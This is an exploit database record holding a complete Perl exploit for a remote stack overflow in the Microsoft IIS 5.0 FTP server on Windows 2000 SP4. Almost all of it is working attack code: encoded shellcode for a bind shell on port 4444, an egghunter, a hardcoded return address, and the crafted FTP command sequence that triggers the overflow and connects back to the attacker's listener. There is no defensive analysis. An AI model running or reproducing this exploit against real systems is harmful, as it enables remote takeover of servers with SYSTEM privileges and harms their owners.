Description
Exploit for windows platform in category remote exploits
{"id": "1337DAY-ID-9516", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)", "description": "Exploit for windows platform in category remote exploits", "published": "2009-09-01T00:00:00", "modified": "2009-09-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/9516", "reporter": "muts", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-14T17:46:25", "viewCount": 18, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://0day.today/exploit/9516", "sourceData": "======================================================================\r\nMicrosoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)\r\n======================================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n# IIS 5.0 FTP Server / Remote SYSTEM exploit \r\n# Win2k SP4 targets \r\n# bug found & exploited by Kingcope,\r\n# Affects IIS6 with stack cookie protection \r\n# Modded by muts, additional egghunter added for secondary larger payload\r\n# Might take a minute or two for the egg to be found.\r\n# Opens bind shell on port 4444\r\n\r\n# http://www.offensive-security.com/0day/msftp.pl.txt\r\n\r\nuse IO::Socket; \r\n$|=1; \r\n$sc = \"\\x89\\xe2\\xdd\\xc5\\xd9\\x72\\xf4\\x5f\\x57\\x59\\x49\\x49\\x49\\x49\\x43\" .\r\n\"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58\\x34\" .\r\n\"\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42\\x41\\x41\" .\r\n\"\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58\" .\r\n\"\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x45\\x36\\x4d\\x51\\x48\\x4a\\x4b\\x4f\" .\r\n\"\\x44\\x4f\\x47\\x32\\x46\\x32\\x42\\x4a\\x43\\x32\\x46\\x38\\x48\\x4d\\x46\" .\r\n\"\\x4e\\x47\\x4c\\x45\\x55\\x51\\x4a\\x44\\x34\\x4a\\x4f\\x48\\x38\\x46\\x34\" .\r\n\"\\x50\\x30\\x46\\x50\\x50\\x57\\x4c\\x4b\\x4b\\x4a\\x4e\\x4f\\x44\\x35\\x4a\" .\r\n\"\\x4a\\x4e\\x4f\\x43\\x45\\x4b\\x57\\x4b\\x4f\\x4d\\x37\\x41\\x41\";\r\n# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b \"\\x00\\x0a\\x0d\"\r\n\r\n$shell=\"T00WT00W\" .\"\\xda\\xde\\xbd\\x2d\\xe7\\x9b\\x9f\\x2b\\xc9\\xb1\\x56\\xd9\\x74\\x24\\xf4\" .\r\n\"\\x5a\\x83\\xea\\xfc\\x31\\x6a\\x15\\x03\\x6a\\x15\\xcf\\x12\\x67\\x77\\x86\" .\r\n\"\\xdd\\x98\\x88\\xf8\\x54\\x7d\\xb9\\x2a\\x02\\xf5\\xe8\\xfa\\x40\\x5b\\x01\" .\r\n\"\\x71\\x04\\x48\\x92\\xf7\\x81\\x7f\\x13\\xbd\\xf7\\x4e\\xa4\\x70\\x38\\x1c\" .\r\n\"\\x66\\x13\\xc4\\x5f\\xbb\\xf3\\xf5\\xaf\\xce\\xf2\\x32\\xcd\\x21\\xa6\\xeb\" .\r\n\"\\x99\\x90\\x56\\x9f\\xdc\\x28\\x57\\x4f\\x6b\\x10\\x2f\\xea\\xac\\xe5\\x85\" .\r\n\"\\xf5\\xfc\\x56\\x92\\xbe\\xe4\\xdd\\xfc\\x1e\\x14\\x31\\x1f\\x62\\x5f\\x3e\" .\r\n\"\\xeb\\x10\\x5e\\x96\\x22\\xd8\\x50\\xd6\\xe8\\xe7\\x5c\\xdb\\xf1\\x20\\x5a\" .\r\n\"\\x04\\x84\\x5a\\x98\\xb9\\x9e\\x98\\xe2\\x65\\x2b\\x3d\\x44\\xed\\x8b\\xe5\" .\r\n\"\\x74\\x22\\x4d\\x6d\\x7a\\x8f\\x1a\\x29\\x9f\\x0e\\xcf\\x41\\x9b\\x9b\\xee\" .\r\n\"\\x85\\x2d\\xdf\\xd4\\x01\\x75\\xbb\\x75\\x13\\xd3\\x6a\\x8a\\x43\\xbb\\xd3\" .\r\n\"\\x2e\\x0f\\x2e\\x07\\x48\\x52\\x27\\xe4\\x66\\x6d\\xb7\\x62\\xf1\\x1e\\x85\" .\r\n\"\\x2d\\xa9\\x88\\xa5\\xa6\\x77\\x4e\\xc9\\x9c\\xcf\\xc0\\x34\\x1f\\x2f\\xc8\" .\r\n\"\\xf2\\x4b\\x7f\\x62\\xd2\\xf3\\x14\\x72\\xdb\\x21\\xba\\x22\\x73\\x9a\\x7a\" .\r\n\"\\x93\\x33\\x4a\\x12\\xf9\\xbb\\xb5\\x02\\x02\\x16\\xc0\\x05\\xcc\\x42\\x80\" .\r\n\"\\xe1\\x2d\\x75\\x36\\xad\\xb8\\x93\\x52\\x5d\\xed\\x0c\\xcb\\x9f\\xca\\x84\" .\r\n\"\\x6c\\xe0\\x38\\xb9\\x25\\x76\\x74\\xd7\\xf2\\x79\\x85\\xfd\\x50\\xd6\\x2d\" .\r\n\"\\x96\\x22\\x34\\xea\\x87\\x34\\x11\\x5a\\xc1\\x0c\\xf1\\x10\\xbf\\xdf\\x60\" .\r\n\"\\x24\\xea\\x88\\x01\\xb7\\x71\\x49\\x4c\\xa4\\x2d\\x1e\\x19\\x1a\\x24\\xca\" .\r\n\"\\xb7\\x05\\x9e\\xe9\\x4a\\xd3\\xd9\\xaa\\x90\\x20\\xe7\\x33\\x55\\x1c\\xc3\" .\r\n\"\\x23\\xa3\\x9d\\x4f\\x10\\x7b\\xc8\\x19\\xce\\x3d\\xa2\\xeb\\xb8\\x97\\x19\" .\r\n\"\\xa2\\x2c\\x6e\\x52\\x75\\x2b\\x6f\\xbf\\x03\\xd3\\xc1\\x16\\x52\\xeb\\xed\" .\r\n\"\\xfe\\x52\\x94\\x10\\x9f\\x9d\\x4f\\x91\\xbf\\x7f\\x5a\\xef\\x57\\x26\\x0f\" .\r\n\"\\x52\\x3a\\xd9\\xe5\\x90\\x43\\x5a\\x0c\\x68\\xb0\\x42\\x65\\x6d\\xfc\\xc4\" .\r\n\"\\x95\\x1f\\x6d\\xa1\\x99\\x8c\\x8e\\xe0\\x90\";\r\n\r\n\r\nprint \"IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\\n\"; \r\nif ($#ARGV ne 1) { \r\nprint \"usage: iiz5.pl <target> <your local ip>\\n\"; \r\nexit(0); \r\n} \r\nsrand(time()); \r\n$port = int(rand(31337-1022)) + 1025; \r\n$locip = $ARGV[1]; \r\n$locip =~ s/\\./,/gi; \r\nif (fork()) { \r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], \r\n PeerPort => '21', \r\n Proto => 'tcp'); \r\n$patch = \"\\x7E\\xF1\\xFA\\x7F\";\r\n$retaddr = \"\\x9B\\xB1\\xF4\\x77\"; # JMP ESP univ on 2 win2k platforms \r\n\r\n$v = \"KSEXY\" . $sc . \"V\" x (500-length($sc)-5); \r\n# top address of stack frame where shellcode resides, is hardcoded inside this block \r\n$findsc=\"\\xB8\\x55\\x55\\x52\\x55\\x35\\x55\\x55\\x55\\x55\\x40\\x81\\x38\\x53\" \r\n .\"\\x45\\x58\\x59\\x75\\xF7\\x40\\x40\\x40\\x40\\xFF\\xFF\\xE0\"; \r\n\r\n# attack buffer \r\n$c = $findsc . \"C\" . ($patch x (76/4)) . $patch.$patch. \r\n ($patch x (52/4)) .$patch.\"EEEE$retaddr\".$patch. \r\n \"HHHHIIII\". \r\n$patch.\"JKKK\".\"\\xE9\\x63\\xFE\\xFF\\xFF\\xFF\\xFF\".\"NNNN\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"USER anonimoos\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PASS $shell\\r\\n\";\r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"USER anonimoos\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PASS $shell\\r\\n\";\r\n$x = <$sock>; \r\nprint $x; \r\n\r\nprint $sock \"USER anonymous\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PASS anonymous\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"MKD w00t$port\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; # We store shellcode in memory of process (stack) \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>;\r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"CWD w00t$port\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"MKD CCC\". \"$c\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PORT $locip,\" . int($port / 256) . \",\" . int($port % 256) . \"\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\n# TRIGGER \r\nprint $sock \"NLST $c*/../C*/\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nwhile (1) {} \r\n} else { \r\nmy $servsock = IO::Socket::INET->new(LocalAddr => \"0.0.0.0\", LocalPort => $port, Proto => 'tcp', Listen => 1); \r\ndie \"Could not create socket: $!\\n\" unless $servsock; \r\nmy $new_sock = $servsock->accept(); \r\nwhile(<$new_sock>) { \r\nprint $_; \r\n} \r\nclose($servsock); \r\n} \r\n#Cheerio, \r\n# \r\n#Kingcope\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "_state": {"dependencies": 1647596110, "score": 1659766679, "epss": 1678811959}}
{}
Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)